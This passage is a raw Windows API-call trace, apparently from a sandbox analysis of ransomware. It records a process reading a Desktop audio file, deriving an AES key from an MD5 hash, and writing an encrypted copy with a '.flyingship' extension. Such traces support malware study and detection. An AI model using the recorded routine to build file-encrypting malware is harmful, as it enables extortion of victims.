returned 0 [0076.352] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.352] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0076.352] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.352] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361d4d90, ftCreationTime.dwHighDateTime=0x1d5da95, ftLastAccessTime.dwLowDateTime=0x9aa79520, ftLastAccessTime.dwHighDateTime=0x1d5da15, ftLastWriteTime.dwLowDateTime=0x9aa79520, ftLastWriteTime.dwHighDateTime=0x1d5da15, nFileSizeHigh=0x0, nFileSizeLow=0x8577, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="7TIqi.m4a", cAlternateFileName="")) returned 0x6b8b38 [0076.352] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0076.353] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.353] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.353] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.353] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.353] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0076.353] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.353] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0076.353] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.353] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0076.353] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.353] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.353] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.353] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.353] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0076.354] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.355] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x6969c0) returned 1 [0076.356] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.356] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.356] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0076.356] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.356] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.356] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.356] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.356] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.356] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.356] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.356] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.356] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.357] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.357] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.357] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.357] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0076.357] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.357] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.357] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.357] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.357] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.357] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.357] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.357] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.357] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.357] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.357] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.357] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.357] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.357] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.357] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.357] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.357] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.358] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.358] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.358] CryptCreateHash (in: hProv=0x6969c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0076.358] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.358] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.358] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.358] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.358] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0076.358] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.358] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.358] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.358] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.358] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.358] CryptHashData (hHash=0x6b89f8, pbData=0x6f9728, dwDataLen=0x16, dwFlags=0x1) returned 1 [0076.358] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.358] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.358] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.358] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.358] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.358] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.359] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.359] CryptDeriveKey (in: hProv=0x6969c0, Algid=0x660e, hBaseData=0x6b89f8, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8af8) returned 1 [0076.359] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.359] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.359] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.359] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.359] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.359] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.359] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0076.359] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.359] CryptDestroyHash (hHash=0x6b89f8) returned 1 [0076.359] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.359] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.359] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.359] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.359] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7tiqi.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0076.360] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.360] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0076.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0076.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0076.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.360] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.360] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0076.360] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.360] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89f8 | out: hHeap=0x650000) returned 1 [0076.360] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0076.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.361] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.361] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0076.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0076.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0076.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3530 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.362] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.362] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d34d8 [0076.362] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0076.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0076.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.363] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b89f8 [0076.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0076.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.363] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.flyingship.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7tiqi.flyingship.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0076.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0076.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0076.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0076.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.364] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.364] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.364] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0076.364] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 